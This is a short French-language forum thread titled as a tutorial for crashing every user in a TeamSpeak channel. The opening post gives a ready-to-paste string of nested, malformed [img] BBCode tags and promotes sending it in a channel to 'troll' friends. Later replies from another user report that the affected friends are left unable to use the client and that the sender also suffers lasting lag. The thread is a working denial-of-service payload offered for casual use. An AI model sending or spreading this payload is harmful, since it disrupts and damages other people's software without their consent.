Comment faire crasher tous les utilisateurs d'un Teamspeak[TUTO]

Chuk

Premium
Inscription
6 Mars 2011
Messages
1 448
Réactions
696
Points
7 741
Salut , donc je vien de trouvé une astuce pour faire buggé tous les utilisateurs d'un teamspeak.
Donc , vous envoyez le code ci-dessous dans votre channel ( çela feras crash tous les gens dans le channel ).
Code:
[img][img]//E|/\[/img][/img][img][img]//$Q/2[/img][/img][img][img]//Uv/![/img][/img][img][img]//Ut/1[/img][/img][img][img]//>`/>[/img][/img][img][img]//4]/N[/img][/img][img][img]//U@/y[/img][/img][img][img]//LP/F[/img][/img][img][img]//rx/I[/img][/img][img][img]//Sy/"[/img][/img][img][img]//10/)[/img][/img][img][img]//gC/d[/img][/img][img][img]//q\/a[/img][/img][img][img]//[N/,[/img][/img][img][img]//U}/d[/img][/img][img][img]//R//E[/img][/img][img][img]//3h/4[/img][/img][img][img]//1N/P[/img][/img][img][img]//ox/G[/img][/img][img][img]//Z7/t[/img][/img][img][img]//da/H[/img][/img][img][img]//7w/1[/img][/img][img][img]//qj/Q[/img][/img][img][img]//{B/Y[/img][/img][img][img]//%6/![/img][/img][img][img]//]F/W[/img][/img][img][img]//]^/G[/img][/img][img][img]//8\/^[/img][/img][img][img]//$Q/{[/img][/img][img][img]//En/h[/img][/img]

Voilà , c'est tout c'est simple et efficace et bien pour troll des amis ;)
 
Dernière édition par un modérateur:

Aaslaane

Membre
Inscription
25 Décembre 2012
Messages
1 118
Réactions
106
Points
2 716
Help please, bon je l'ai fais pour rigoler mais mes amis ont des gros problème et sont bugué comment je pourrais faire?
 

Aaslaane

Membre
Inscription
25 Décembre 2012
Messages
1 118
Réactions
106
Points
2 716
Help, désolé de spam, quand il se co ils peuvent plus rien faire.
 

Aaslaane

Membre
Inscription
25 Décembre 2012
Messages
1 118
Réactions
106
Points
2 716
Bon faite gaffe quand vous utilisez ce code, car vous serez affectez aussi et donc vous aurez des perma lag
 
Haut